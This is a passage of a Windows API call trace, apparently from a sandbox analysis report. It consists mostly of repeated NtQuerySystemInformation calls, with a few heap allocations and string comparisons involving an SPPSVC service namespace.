SystemInformation=0xc751dfd030, Length=0x28, ResultLength=0x0) [0208.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x28, ResultLength=0x0) [0208.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd030, Length=0x28, ResultLength=0x0) [0208.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.792] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0a0, Length=0x28, ResultLength=0x0) [0208.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x38, ResultLength=0x0) [0208.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd120, Length=0x28, ResultLength=0x0) [0208.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd120, Length=0x28, ResultLength=0x0) [0208.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.795] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x38, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd080, Length=0x20, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd000, Length=0x20, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd000, Length=0x20, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd000, Length=0x20, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd200, Length=0x38, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd080, Length=0x20, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x20, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd010, Length=0x20, ResultLength=0x0) [0208.796] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.797] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.801] GetProcessHeap () returned 0x2026c630000 [0208.801] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d653bd0 [0208.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.829] GetProcessHeap () returned 0x2026c630000 [0208.829] RtlAllocateHeap (HeapHandle=0x2026c630000, Flags=0x0, Size=0x28) returned 0x2026d653ba0 [0208.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe1c0, Length=0x28, ResultLength=0x0) [0208.830] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe010, Length=0x28, ResultLength=0x0) [0208.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x28, ResultLength=0x0) [0208.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x28, ResultLength=0x0) [0208.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdff0, Length=0x20, ResultLength=0x0) [0208.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdff0, Length=0x20, ResultLength=0x0) [0208.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x20, ResultLength=0x0) [0208.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x20, ResultLength=0x0) [0208.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe1c0, Length=0x28, ResultLength=0x0) [0208.841] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe010, Length=0x28, ResultLength=0x0) [0208.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x28, ResultLength=0x0) [0208.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.848] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x28, ResultLength=0x0) [0208.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdff0, Length=0x20, ResultLength=0x0) [0208.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdff0, Length=0x20, ResultLength=0x0) [0208.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x20, ResultLength=0x0) [0208.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x20, ResultLength=0x0) [0208.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe1c0, Length=0x28, ResultLength=0x0) [0208.850] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe010, Length=0x28, ResultLength=0x0) [0208.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x28, ResultLength=0x0) [0208.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x28, ResultLength=0x0) [0208.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdff0, Length=0x20, ResultLength=0x0) [0208.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdff0, Length=0x20, ResultLength=0x0) [0208.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x20, ResultLength=0x0) [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x20, ResultLength=0x0) [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, 